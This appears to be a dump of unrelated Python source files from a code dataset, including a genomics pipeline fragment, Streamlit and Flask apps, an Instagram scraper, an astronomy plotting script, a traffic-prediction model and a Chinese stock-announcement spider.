\"unknown_N_filter\" and file.endswith(\".vcf\"):\n is_callable = True\n out_file += \".no_high_Ns.vcf\"\n elif pair[0] == \"get_known_data\" and file.endswith(\".vcf\"):\n is_callable = True\n out_file = pair[1][1] + '/'\n elif pair[0] == \"filter_vcfs\" and file.endswith(\".vcf\"):\n is_callable = True\n out_file += \".filtered.vcf\"\n if not is_callable:\n continue\n parameters = \"'%s', '%s', \" % (in_file, out_file)\n for parameter in pair[1][2:]:\n if isinstance(parameter, dict):\n parameters += \"%s, \" % parameter\n else:\n if parameter == depth_file:\n parameters += \"%s, \" % depth_dict\n else:\n parameters += \"'%s', \" % parameter\n if pair[0] == \"get_depth\" or pair[0] == \"get_known_data\":\n parameters += \"%s\" % first\n else:\n parameters = parameters[:-2]\n\n print(\"Calling %s\" % pair[0])\n print(parameters)\n\n function_called_return_value = eval(\"%s.%s(%s)\" % (pair[0], pair[0], parameters))\n if function_called_return_value != 0:\n return function_called_return_value\n first = False\n is_callable = False\n\n else:\n parameters = \"\"\n for parameter in pair[1]:\n if isinstance(parameter, dict):\n parameters += \"%s, \" % parameter\n else:\n parameters += \"'%s', \" % parameter\n if pair[0] == \"get_depth\" or pair[0] == \"get_known_data\":\n parameters += \"%s\" % True\n else:\n parameters = parameters[:-2]\n print(\"Calling %s\" % pair[0])\n\n function_called_return_value = eval(\"%s.%s(%s)\" % (pair[0], pair[0], parameters))\n if function_called_return_value != 0:\n return function_called_return_value\n\n if pair[0] == \"get_depth\":\n depth_file = pair[1][1]\n reading_depth = open(depth_file)\n depth_dict = {}\n line = reading_depth.readline()\n while line:\n file_depth = line.split(':')\n depth_dict[file_depth[0]] = float(file_depth[1])\n line = reading_depth.readline()\n 
reading_depth.close()\n\n return 123\n\n\n# ---\nsys.exit(main(sys.argv[1:]))\n","sub_path":"utils/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"363107090","text":"import streamlit as st\nfrom multiapp import MultiApp\nfrom apps import home, app1,app2 # import your app modules here\nfrom PIL import Image\n\nhi=Image.open('radiographer.png')\nst.set_page_config(page_title='MedAI',page_icon=hi)\n\nst.markdown(\n '''\n \n ''', \n unsafe_allow_html=True)\n\napp = MultiApp()\nst.sidebar.title('Image Analysis')\n# Add all your application here\napp.add_app(\"Home\", home.app)\napp.add_app(\"Haemorrhage Detection\", app1.app)\napp.add_app(\"Pneumonia Detection\",app2.app)\n\n# The main app\napp.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"579626269","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup as bs\nimport time\nimport os\nimport requests\nimport re\nfrom urllib.request import urlopen\nfrom urllib import request\nimport json\nimport shutil\nimport sys\nfrom pandas.io.json import json_normalize\nimport pandas as pd, numpy as np\n\n\nusername= input('Input instagram username : ')\nbrowser = webdriver.Chrome('E:/Downloads/chromedriver_win32/chromedriver')\nbrowser.get('https://www.instagram.com/'+username+'/?hl=en')\n# browser = requests.get('https://www.instagram.com/'+username+'/?hl=en')\nPagelength = browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n\n#Extract links from user profile page\nlinks=[]\n# source = browser.text\nsource = browser.page_source\ndata=bs(source, 'html.parser')\nbody = data.find('body')\nscript = str(body.find('script', text=lambda t: t.startswith('window._sharedData')))\npage_json = script.split(' = ', 1)[1].rstrip(';')\ndata = json.loads(page_json)\n\n# Check account is exists\nif 'HttpErrorPage' in data['entry_data'].keys():\n print('Instagram account not found')\n sys.exit()\n\naccount_private = data['entry_data']['ProfilePage'][0]['graphql']['user']['is_private']\n\nif account_private == True:\n print(\"Make sure account isn't private\")\n sys.exit()\n\n# #try 'script.string' instead of script.text if you get error on index out of range\n# for link in data['entry_data']['ProfilePage'][0]['graphql']['user']['edge_owner_to_timeline_media']['edges']:\n# links.append('https://www.instagram.com'+'/p/'+link['node']['shortcode']+'/')\n#try with ['display_url'] instead of ['shortcode'] if you don't get links \n#Extract links from hashtag page\nlinks=[]\n# source = browser.page_source\n# data=bs(source, 'html.parser')\n# body = data.find('body')\n# script = str(body.find('script', text=lambda t: t.startswith('window._sharedData')))\n# page_json = script.split(' = ', 1)[1].rstrip(';')\n# data_post = json.loads(page_json)\nfor link in data['entry_data']['ProfilePage'][0]['graphql']['user']['edge_owner_to_timeline_media']['edges']:\n links.append('https://www.instagram.com'+'/p/'+link['node']['shortcode']+'/')\n\n\nprint(links)\nprint(len(links))\nsys.exit()\n# result=pd.DataFrame()\npath = \"S:/scraper-instagram/\"\nfor i in range(2):\n try:\n page = requests.get(links[i]).text\n data=bs(page, 'html.parser')\n body = data.find('body')\n script = str(body.find('script'))\n raw = script.split(' = ', 1)[1].strip().replace('window._sharedData =', 
'').replace(';', '')\n        json_data=json.loads(raw)\n\n        posts = json_data['entry_data']['PostPage'][0]['graphql']['shortcode_media']\n        # posts= json.dumps(posts)\n        # posts = json.loads(posts))\n\n        # Making Folder of Feed\n        folder_name = posts['shortcode']\n        \n        # print(os.path.isdir((path+folder_name)))\n        # Check whether the folder exists\n        check_folder = os.path.isdir(path+folder_name)\n        \n        if check_folder == True:\n            shutil.rmtree(path+folder_name)\n            # os.rmdir(path+folder_name)\n            os.mkdir(path+folder_name)\n        else:\n            os.mkdir(path+folder_name)\n\n        # Insert Display Media to Folder Feed\n        r = requests.get(posts['display_url'])\n        with open(path+folder_name+\"/\"+posts['shortcode']+\".jpg\", 'wb') as f:\n            f.write(r.content) \n\n        if 'edge_sidecar_to_children' in posts.keys():\n            # Insert Other Media to Folder Feed\n            json_other_media = json.dumps(posts['edge_sidecar_to_children']['edges'])\n            json_other_media = json.loads(json_other_media)\n\n            # shutil.rmtree(path+folder_name)\n            for other_media in json_other_media:\n                detail = other_media['node']\n                s = requests.get(detail['display_url'])\n                with open(path+folder_name+\"/\"+detail['shortcode']+\".jpg\", 'wb') as f:\n                    f.write(s.content) \n\n            if os.path.exists(path+folder_name+'/'+folder_name+'.jpg'):\n                os.remove(path+folder_name+'/'+folder_name+'.jpg')\n            \n\n        # Insert Caption Feed to Folder\n        caption_media = json.dumps(posts['edge_media_to_caption']['edges'])\n        caption_media = json.loads(caption_media)\n        caption_media = caption_media[0]['node']['text']\n\n        write_caption = open(path+folder_name+\"/\"+\"caption.txt\", 'w', encoding='utf-8')\n        write_caption.write(str(caption_media)) \n        \n    except AssertionError as error:\n        print(error)\n        np.nan\n\n# result = result.drop_duplicates(subset = 'shortcode')\n# result.index = range(len(result.index))\n\n# html = result.to_html()\n# text_file = open(\"index1.html\", \"w\")\n# text_file.write(str(html.encode(\"utf-8\")))\n# text_file.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"416815113","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = 'profile'\n\nurlpatterns = [\n    # \"/polls\" is the prefix\n    path('', views.index, name='index'),\n    path('index', views.index, name='index'),\n    path('/class/', views.classInfo, name='class'),\n    path('classlist', views.classlist, name='classlist'),\n    path('staff', views.staff, name='staff'),\n    path('UpdateEmail',views.UpdateEmail, name='UpdateEmail'),\n    path('UpdatePhone',views.UpdatePhone, name='UpdatePhone'),\n    path('/registerClass',views.registerClass, name='registerClass'),\n]\n","sub_path":"personal/yxg352/CameronTests/profile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"134651924","text":"import os\nimport shutil\n\n#Create folder\nif not os.path.isdir(\"./mi_carpeta\"):\n    os.mkdir(\"./mi_carpeta\") #If the folder does not exist, create it\nelse:\n    print(\"The directory already exists\")\n\n#Copy folder\nruta_original = './mi_carpeta'\nruta_nueva = './mi_carpeta_COPY'\nshutil.copytree(ruta_original, ruta_nueva)\n\n#Read folder contents\nprint(\"Folder contents\")\ncontenido = os.listdir(\"./mi_carpeta\")\nprint(contenido)\n\nfor fichero in contenido:\n    print(\"Files: \" + fichero)\n\n#Delete mi_carpeta\nos.rmdir('./mi_carpeta')","sub_path":"Python/practicas_victor_masterpython/14-sistema-archivos/directorios.py","file_name":"directorios.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"238072174","text":"# -*- coding: utf-8 -*-\nfrom flask import (Blueprint, request, render_template, flash, url_for,\n    \tredirect, session)\nfrom flask.ext.login import login_required\nfrom nektime.interview.forms import InterviewForm, QuestionForm\nfrom nektime.utils import flash_errors\nfrom nektime.models import User, Answer, Question\n\nfrom sqlalchemy import desc\nimport random\n\nblueprint = Blueprint(\"interview\", __name__, url_prefix='',\n                      static_folder=\"../static\")\n\n\n\n@blueprint.route(\"/interview/\", methods=['GET','POST'])\n@login_required\ndef interview(question_id=None):\n    question=Question.query.get(question_id)\n    user=User.query.get(session['user_id'])\n    created_at=''\n    form = InterviewForm()\n    if form.validate_on_submit():\n        new_answer = Answer.create(text=form.answer.data, user=user, question=question, created_at=created_at)\n        flash(\"Your answer has been submitted\")\n        return redirect(url_for('interview.list', question=question.id))\n    return render_template(\"interview/interview.html\", form=form, question=question)\n\n@blueprint.route(\"/list/\")\ndef list(question):\n    answers = Answer.query.filter_by(question_id=question).all()\n    my_question = Question.query.filter_by(id=question).first()\n    return render_template('interview/list.html', my_question=my_question, answers=answers)\n\n@blueprint.route(\"/question/\", methods=['GET','POST'])\n@login_required\ndef question():\n    form = QuestionForm()\n    if form.validate_on_submit():\n        # text=form.question.data\n        user=User.query.get(session['user_id'])\n        created_at = ''\n        new_question = Question.create(text=form.question.data, user=user, created_at=created_at)\n        flash(\"Your question has been submitted\")\n        return redirect(url_for('interview.dashboard'))\n    return render_template(\"interview/question.html\", form=form)\n\n\n@blueprint.route(\"/dashboard/\")\ndef dashboard():\n    questions = Question.query.order_by(Question.id).all()\n    return render_template(\"interview/dashboard.html\", 
questions=questions)\n","sub_path":"nektime/deactivate/interview/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"246487123","text":"def bs(a, l, r, x): \r\n if r >= l: \r\n mid =int((l+r)/2)\r\n print(\"Guess: \",a[mid],\"Between\",a[l],\"and\",a[r])\r\n if a[mid] == x: \r\n return mid\r\n\r\n elif a[mid] > x: \r\n return bs(a, l, mid-1, x) \r\n\r\n else: \r\n return bs(a, mid + 1, r, x) \r\n else: \r\n return -1\r\n \r\ns=int(input(\"Enter size:\"))\r\na=[0]*s\r\nprint(\"Enter List: \")\r\nfor i in range(s):\r\n a[i]=int(input())\r\n\r\nprint(a)\r\nx=int(input(\"\\nEnter the Key:\"))\r\nresult = bs(a, 0, len(a)-1, x) \r\nif result != -1: \r\n print (\"Element is present at index:\",result )\r\nelse: \r\n print (\"Element is not present in array\")\r\n","sub_path":"December-01/py_anuppriya_binary.py","file_name":"py_anuppriya_binary.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"590618543","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 12:23:28 2019\n\nCode to plot M_star vs z\n\n@author: ppxee\n\"\"\"\n### Import required libraries ###\nimport matplotlib.pyplot as plt #for plotting\nfrom astropy.io import fits #for handling fits\nfrom astropy.table import Table #for handling tables\nimport numpy as np #for handling arrays\n#import math\n#from astropy.stats import median_absolute_deviation\nimport vari_funcs #my module to help run code neatly\nimport matplotlib.colors as colors\nfrom scipy.stats import binned_statistic_2d\nplt.close('all')\n\n\n### Get fits ###\ntbdata = fits.open('mag_flux_tables/mag_flux_table_best_extra_clean_no06.fits')[1].data\ndr11 = fits.open('UDS_catalogues/DR11-2arcsec-June24-2018+plusXY_best.fits')[1].data\nvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_restframe.fits')[1].data\nfullxray = Table.read('UDS_catalogues/DR11-2arcsec-June24-2018+plusXY_best_chandra.fits')\nsternvary = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_SpUDSdata_IRAC_stern.fits')[1].data\nstern = fits.open('UDS_catalogues/SpUDS_IRAC_catalogue_DR11data_stern.fits')[1].data\nnosternvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_SpUDSdata_IRAC.fits')[1].data\ndeviant = fits.open('variable_tables/no06_variables_chi30_2arcsec_deviant_DR11data_restframe.fits')[1].data\nsn = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_restframe_SN.fits')[1].data\ndev07 = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_restframe_07B.fits')[1].data\n#deviant = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_restframe_allspecz.fits')[1].data\n\n### with x/nox split ###\n#noxvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_noXray_DR11data_restframe.fits')[1].data\n#xvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_Xray_DR11data_restframe.fits')[1].data\nnoxvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_nochanXray_DR11data_restframe.fits')[1].data\nxvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_chandata_DR11data_restframe.fits')[1].data\n\nnoxsternvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_SpUDSdata_IRAC_noXray_stern.fits')[1].data\nxsternvarydata = 
fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_SpUDSdata_IRAC_Xray_stern.fits')[1].data\n\ndef ignore_zeros(m):\n m[m==0] = np.nan\n mask = ~np.isnan(m)\n m = m[mask]\n return m, mask\n\ndef prep_variables(tbdata):\n z = vari_funcs.get_z(tbdata) # get redshift\n m = tbdata['Mstar_z_p'] #get mass\n m, mask = ignore_zeros(m) #mask those with null mass\n z = z[mask] #apply mask to z array\n return z, m\n\n\nz, m = prep_variables(dr11)\nnoxz, noxm = prep_variables(noxvarydata)\nxz, xm = prep_variables(xvarydata)\nvaryz, varym = prep_variables(varydata)\nallxz, allxm = prep_variables(fullxray)\nallsternz, allsternm = prep_variables(stern)\nsternz, sternm = prep_variables(sternvary)\nnosternz, nosternm = prep_variables(nosternvarydata)\nnoxsternz, noxsternm = prep_variables(noxsternvarydata)\nxsternz, xsternm = prep_variables(xsternvarydata)\ndevz, devm = prep_variables(deviant)\nsnz, snm = prep_variables(sn)\ndev07z, dev07m = prep_variables(dev07)\n\nx_edges = np.linspace(0,4.5,100)\ny_edges = np.logspace(5,12,100)\n\nH, xbins, ybins, _ = plt.hist2d(z, m, bins=[x_edges, y_edges])\n\n\nplt.figure()\nplt.hist(m, bins=y_edges, \n histtype='step')\n\n#plt.hist([noxm, xm, devm, varym], bins=np.logspace(4.5,12), color=['b','r','y','g'], \n# histtype='step', label=['Non-X-ray Variable','X-ray Variable','Deviant','all variables'])\nplt.xlabel('$M_{star}$')\nplt.ylabel('Number')\nplt.xscale('log')\n\nplt.figure()\nplt.hist(z, bins=x_edges, \n histtype='step')\nplt.xlabel('z')\nplt.ylabel('Number')\n\n##plt.figure(figsize=[9,7])\nplt.figure(figsize=[10,7])\nplt.pcolormesh(xbins, ybins, H.T, cmap='binary',vmax=200)\n#plt.plot(z, m, '.',markersize=1, color='tab:gray', alpha=0.25, label='Galaxy')\n#plt.plot(allsternz, allsternm, 'm.', label='Stern AGN', alpha=0.5)\nplt.plot(allxz, allxm, 'ks',markersize=5, label='X-ray AGN')\nplt.plot(noxz, noxm, 'bo', label='Variable Non-X-ray AGN')\nplt.plot(xz, xm, 'ro', label='Variable X-ray AGN')\n#plt.plot(devz, devm, 'yd', label='Deviant in 07B')\n#plt.plot(sternz, sternm, 'yd',markersize=10, mfc='none', label='Stern Variable')\n\n#plt.hlines(2e9,-0.1,4.5,linestyle='dashed')\n\nplt.yscale('log')\nplt.xlim(xmin=-0.1, xmax=4.5)\nplt.ylim(ymin=2e5, ymax=5e11)\nplt.legend(loc='lower right')\nplt.xlabel('z')\nplt.ylabel('$M_{star}$')\n#plt.colorbar()\nplt.tight_layout()\n#\n#### Plot with stern details\n##plt.figure(figsize=[9,7])\n#plt.figure(figsize=[10,7])\n#plt.plot(z, m, '.',markersize=1, color='tab:gray', alpha=0.25, label='Galaxy')\n#plt.plot(allsternz, allsternm, 'k.', label='Stern AGN', alpha=0.5)\n##plt.plot(allxz, allxm, 'k+', label='X-ray Non-Variable')\n##plt.plot(noxsternz, noxsternm, 'bo', label='Non-X-ray Variable')\n##plt.plot(xsternz, xsternm, 'ro', label='X-ray Variable')\n#plt.plot(nosternz, nosternm, 'go', label='Variable Non-Stern AGN')\n##plt.plot(xz, xm, 'go')#, label='X-ray Variable')\n#plt.plot(sternz, sternm, 'mo', label='Variable Stern AGN')\n#\n##plt.hlines(2e9,-0.1,4.5,linestyle='dashed')\n#\n#plt.yscale('log')\n#plt.xlim(xmin=-0.1, xmax=4.5)\n#plt.ylim(ymin=2e5, ymax=5e11)\n#plt.legend(loc='lower right')\n#plt.xlabel('z')\n#plt.ylabel('$M_{star}$')\n#plt.tight_layout()\n\n### Plot with deviant details\n#plt.figure(figsize=[9,7])\nplt.figure(figsize=[10,7])\n#plt.plot(z, m, '.',markersize=1, color='tab:gray', alpha=0.25, label='Galaxy')\nplt.pcolormesh(xbins, ybins, H.T, cmap='binary',vmax=200, label='Galaxies')\n#plt.plot(allxz, allxm, 'ks', label='X-ray AGN')\nplt.plot(noxz, noxm, 'bo', label='Variable Non-X-ray 
AGN')\nplt.plot(xz, xm, 'ro', label='Variable X-ray AGN')\nplt.plot(devz, devm, 'ms', markersize=6, label='Deviant')\nplt.plot(snz, snm, 'y*', markersize=12, label='Potential SN')\nplt.plot(dev07z, dev07m, 'gd', markersize=8, label='Deviant in 07B')\n\n#plt.hlines(2e9,-0.1,4.5,linestyle='dashed')\n\nplt.yscale('log')\nplt.xlim(xmin=-0.1, xmax=4.5)\nplt.ylim(ymin=2e5, ymax=5e11)\nplt.legend(loc='lower right')\nplt.xlabel('z')\nplt.ylabel('$M_{star}$')\nplt.tight_layout()\n##%% Plot with flux colours ###\n#### get fluxes from mag-flux ###\n#\n#def get_mean_flux(tbdata):\n# flux = vari_funcs.flux4_stacks(tbdata)\n# meanflux = np.nanmean(flux, axis=1)\n# return meanflux\n#\n#def get_jansky_flux(tbdata):\n# meanmag = tbdata['KMAG_20']\n# meanflux = 10**(23-((meanmag+48.6)/2.5))\n# return meanflux\n# \n#meanflux = get_mean_flux(tbdata)\n#meannoxvary = get_mean_flux(noxvarydata)\n#meanxvary = get_mean_flux(xvarydata)\n#meanvary = get_mean_flux(varydata)\n#\n#### mask flux arrays and make flux colour ###\n#meannoxvary = meannoxvary[noxmask]\n#meanxvary = meanxvary[xmask]\n#\n#### find max and min ###\n#cmax = np.nanmax([np.nanmax(meannoxvary), np.nanmax(meanxvary)])\n#cmin = np.nanmin([np.nanmin(meannoxvary), np.nanmin(meanxvary)])\n#\n#plt.figure(figsize=[10,7])\n#plt.plot(z, m, '.',markersize=1, color='tab:gray', alpha=0.25, label='UDS Galaxy')\n#plt.plot(allxz, allxm, 'k+', label='X-ray Non-Variable')\n##plt.scatter(noxz, noxm, marker='o', c=meannoxvary, label='Non-X-ray Variable', \n## norm=colors.LogNorm(vmin=cmin, vmax=cmax), zorder=3)\n##plt.scatter(xz, xm, marker='o', c=meanxvary, label='X-ray Variable', \n## norm=colors.LogNorm(vmin=cmin, vmax=cmax), zorder=3)\n##cbar=plt.colorbar()\n##cbar.set_label('Mean 2\" Flux')\n#plt.yscale('log')\n#plt.xlim(xmin=-0.1, xmax=4.5)\n#plt.ylim(ymin=1e4, ymax=3e12)\n#plt.legend(loc='lower right')\n#plt.xlabel('z')\n#plt.ylabel('$M_{star}$')\n#plt.tight_layout()\n\n","sub_path":"mstar_z_plot_hess.py","file_name":"mstar_z_plot_hess.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"632716800","text":"import sys\nimport os\nimport base64\nfrom pathlib import Path\ndir = os.path.dirname(__file__)\n\narea_input = str(sys.argv[1])\nday_input = str(sys.argv[2])\ntime_input = str(sys.argv[3])\n\ndir = os.path.dirname(__file__)\nimport cv2\nimport pandas as pd\nimport numpy as np # linear algebra\nfrom sklearn.model_selection import train_test_split\nfrom pprint import pprint\nfrom sklearn.metrics import confusion_matrix\n\ndef process_day(day):\n switcher = {\n \"Saturday\":0,\n \"Sunday\" :1,\n \"Monday\":2,\n \"Tuesday\":2,\n \"Wednesday\":2,\n \"Thursday\":1,\n \"Friday\":0\n }\n return switcher.get(day, \"ERROR\")\ndef process_holiday(day):\n if(day =='Friday' or day =='Saturday'):\n return 1\n else:\n return 0\nfileToReadCSV = f'{area_input}-test-final.csv'\nfullCSVPath = \"G:\\SPL3Repo\\SoftwareProjectLab3_GG\\TrafficAnalyzerUI\\\\bin\\Debug\\Dataset_CSV\\\\\"+fileToReadCSV\ncsvFilePath = os.path.join(dir, fullCSVPath)\ndataset = pd.read_csv(fullCSVPath, sep=',', error_bad_lines=False)\npos = 3\nX = dataset.iloc[:, :4]\npredictions = []\nfor pos in range(4, dataset.shape[1]):\n Y = dataset.iloc[:, pos]\n # pos = pos+1\n # print(Y)\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.1, random_state=0)\n from sklearn.preprocessing import StandardScaler\n from sklearn.model_selection import cross_val_score\n sc = StandardScaler()\n 
sc.fit(X_train)\n X_train_std = sc.transform(X_train)\n X_test_std = sc.transform(X_test)\n\n # Applying Knn\n from sklearn.neighbors import KNeighborsClassifier\n from sklearn.metrics import accuracy_score\n\n knn = KNeighborsClassifier(n_neighbors=5, p=2, metric='minkowski')\n # knn.fit(X_train_std, y_train)\n knn.fit(X, Y)\n timeToPredict = 0.00\n tmp = []\n for i in range(0, 13):\n tmp.append(knn.predict([[1,process_holiday('Sunday'), process_day('Sunday'), timeToPredict]]))\n timeToPredict += 2.00\n predictions.append(tmp)\nsummations = []\nfor i in range(0, 13):\n summations.append(0)\n\n#print(predictions)\nfor i in range(0, 13):\n for j in range(len(predictions)):\n if (predictions[j][i] == 'Y'):\n summations[i] += 2\n if (predictions[j][i] == 'R'):\n summations[i] += 3\n if (predictions[j][i] == 'G'):\n summations[i] += 1\nlabels = ['00:00','02:00','04:00','06:00','08:00','10:00','12:00','14:00','16:00','18:00','20:00','22:00', '23:59']\nimport matplotlib.pyplot as plt\nimport io\nimport urllib, base64\n#print(len(summations))\nplt.bar(labels,summations)\n\nplt.title('Traffic Intensity Per Day')\nplt.xlabel('Time')\nplt.ylabel('Traffic Intensity')\n#plt.show()\nfig = plt.gcf()\nbuf = io.BytesIO()\nfig.savefig(buf, format='png')\nbuf.seek(0)\nstring = base64.b64encode(buf.read()).decode(\"utf-8\")\nprint(string)\n\n\n\n\n\n","sub_path":"ImageToDataPreprocessing/Codes/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"322812465","text":"def dencoding(string,encode=True):\r\n\tdencoding_dict = {'!': '%21','\"': '%22','#': '%23','$': '%24','&': '%26','*': '%2A','+': '%2B','-': '%2D','/': '%2F',':': '%3A','=': '%3D','?': '%3F','@': '%40','\\\\': '%5C','_': '%5F'}\r\n\tprint(\"encode is\",encode)\r\n\tif encode:\r\n\r\n\t\tfor key, value in dencoding_dict.items():\r\n\t\t\tstring = string.replace(key,value)\r\n\telse:\r\n\t\tfor key, value in dencoding_dict.items():\r\n\t\t\tstring = string.replace(value,key)\r\n\treturn string\r\n\r\n\r\nreturned_string = dencoding('!\"#$&*+-/:=?@\\_')\r\nprint(returned_string)\r\nprint('%21%22%23%24%26%2A%2B%2D%2F%3A%3D%3F%40%5C%5F')\r\nreturned_string = dencoding('%21%22%23%24%26%2A%2B%2D%2F%3A%3D%3F%40%5C%5F',False)\r\nprint(returned_string)\r\nprint('!\"#$&*+-/:=?@\\_')","sub_path":"dencoding.py","file_name":"dencoding.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"577184610","text":"import datetime\nimport functools\nimport logging\nimport os\nimport random\nimport re\nimport sys\nimport time\nimport pprint\nimport traceback\n\nfrom retrying import retry\n\ncur_path = os.path.split(os.path.realpath(__file__))[0]\nfile_path = os.path.abspath(os.path.join(cur_path, \"..\"))\nsys.path.insert(0, file_path)\nfrom announcement.juchao_historyant_base import JuchaoHisSpiderBase\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\n\n\nclass JuchaoHistorySpider(JuchaoHisSpiderBase):\n \"\"\"Juchao historical announcements spider \"\"\"\n def __init__(self):\n super(JuchaoHistorySpider, self).__init__()\n self.partten = re.compile('\\<.*\\>')\n self.table_name = 'spy_announcement_data'\n self.fields = ['secu_id', 'category_code', 'title', 'pub_date']\n\n @functools.cached_property\n def category_code_map(self):\n return {\n 'category_bcgz_szsh': ('补充更正', 19),\n 
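dencoding.py above hand-rolls a percent-encoding table and applies it with repeated str.replace calls. For comparison only (no claim about the original author's intent), the standard library's urllib.parse covers the same roundtrip; note that quote never escapes the unreserved characters - and _, unlike the hand-built map:

```python
from urllib.parse import quote, unquote

raw = '!"#$&*+-/:=?@\\_'
encoded = quote(raw, safe='')   # safe='' forces '/' and ':' to be escaped too
decoded = unquote(encoded)

print(encoded)           # %21%22%23%24%26%2A%2B-%2F%3A%3D%3F%40%5C_
print(decoded == raw)    # True
```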
'category_bndbg_szsh': ('半年报', 2),\n 'category_cqdq_szsh': ('澄清致歉', 12),\n 'category_dshgg_szsh': ('董事会', 18),\n 'category_fxts_szsh': ('风险提示', 21),\n 'category_gddh_szsh': ('股东大会', 15),\n 'category_gqbd_szsh': ('股权变动', 16),\n 'category_gqjl_szsh': ('股权激励', 17),\n 'category_gszl_szsh': ('公司治理', 24),\n 'category_gszq_szsh': ('公司债', 25),\n 'category_jj_szsh': ('解禁', 9),\n 'category_jshgg_szsh': ('监事会', 14),\n 'category_kzzq_szsh': ('可转债', 22),\n 'category_ndbg_szsh': ('年报', 4),\n 'category_pg_szsh': ('配股', 7),\n 'category_qtrz_szsh': ('其他融资', 23),\n 'category_qyfpxzcs_szsh': ('权益分派', 11),\n 'category_rcjy_szsh': ('日常经营', 10),\n 'category_sf_szsh': ('首发', 8),\n 'category_sjdbg_szsh': ('三季报', 3),\n 'category_tbclts_szsh': ('特别处理和退市', 13),\n 'category_tszlq_szsh': ('退市整理期', 20),\n 'category_yjdbg_szsh': ('一季报', 1),\n 'category_yjygjxz_szsh': ('业绩预告', 5),\n 'category_zf_szsh': ('增发', 6),\n 'category_zj_szsh': ('中介报告', 26),\n 'category_others': ('其他', 27),\n }\n\n @functools.cached_property\n def secu_id_map(self):\n print(\"* \" * 1000)\n sql = '''select * from bas_secumain where secu_type = 1 ; '''\n secu_id_map = {}\n ret = self._spider_conn.query(sql)\n for r in ret:\n secu_id_map[r['secu_code'][2:]] = r['id']\n return secu_id_map\n\n def process_items(self, ants: list, info: dict):\n items = []\n for ant in ants:\n item = dict()\n try:\n category_code = self.category_code_map.get(info.get(\"cat_code\"))[1]\n except:\n raise ValueError(f\"出现未知分类{info.get('cat_code')}\")\n item['category_code'] = category_code\n secu_code = ant.get('secCode')\n secu_id = self.secu_id_map.get(secu_code)\n if secu_id is None:\n logger.warning(f'{secu_code} 不是 A 股 ')\n continue\n item['secu_id'] = secu_id\n item['title'] = ant.get(\"announcementTitle\")\n item.update({'pdf_link': 'http://static.cninfo.com.cn/' + ant.get(\"adjunctUrl\")})\n time_stamp = ant.get(\"announcementTime\") / 1000\n item.update({'pub_date': datetime.datetime.fromtimestamp(time_stamp)})\n print(item)\n items.append(item)\n return items\n\n @retry(stop_max_attempt_number=3)\n def query_unconditional(self,\n stock_str: str = '',\n start_date: datetime.datetime = None,\n end_date: datetime.datetime = None,\n ):\n counts = 0\n if not start_date and not end_date:\n se_date = ''\n else:\n se_date = \"{}~{}\".format(start_date.strftime(\"%Y-%m-%d\"), end_date.strftime(\"%Y-%m-%d\"))\n\n for page in range(1, 100):\n ants = self._query(stock_str=stock_str, se_date=se_date, cat_code='', page=page, search_key='')\n if len(ants) == 0:\n break\n items = self.process_items(ants, {'cat_code': 'category_others', 'cat_name': '其他'})\n counts += len(items)\n self._spider_conn.batch_insert(items, self.table_name, ['secu_id', 'title', 'pub_date'])\n logger.info(f\"无分类查询: 本次股票{stock_str}, 本次时间{start_date}-->>{end_date}, 数量: {counts}\")\n\n @retry(stop_max_attempt_number=3)\n def query(self,\n stock_str: str = '',\n start_date: datetime.datetime = None,\n end_date: datetime.datetime = None,\n ):\n counts = 0\n count_map = {}\n for cat_code, cat_name in self.ant_types.items():\n cat_num = 0\n time.sleep(random.randint(1, 3)/10)\n if not start_date and not end_date:\n se_date = ''\n else:\n se_date = \"{}~{}\".format(start_date.strftime(\"%Y-%m-%d\"), end_date.strftime(\"%Y-%m-%d\"))\n\n for page in range(1, 100):\n ants = self._query(stock_str=stock_str, se_date=se_date, cat_code=cat_code, page=page, search_key='')\n if len(ants) == 0:\n break\n items = self.process_items(ants, {'cat_code': cat_code, 'cat_name': 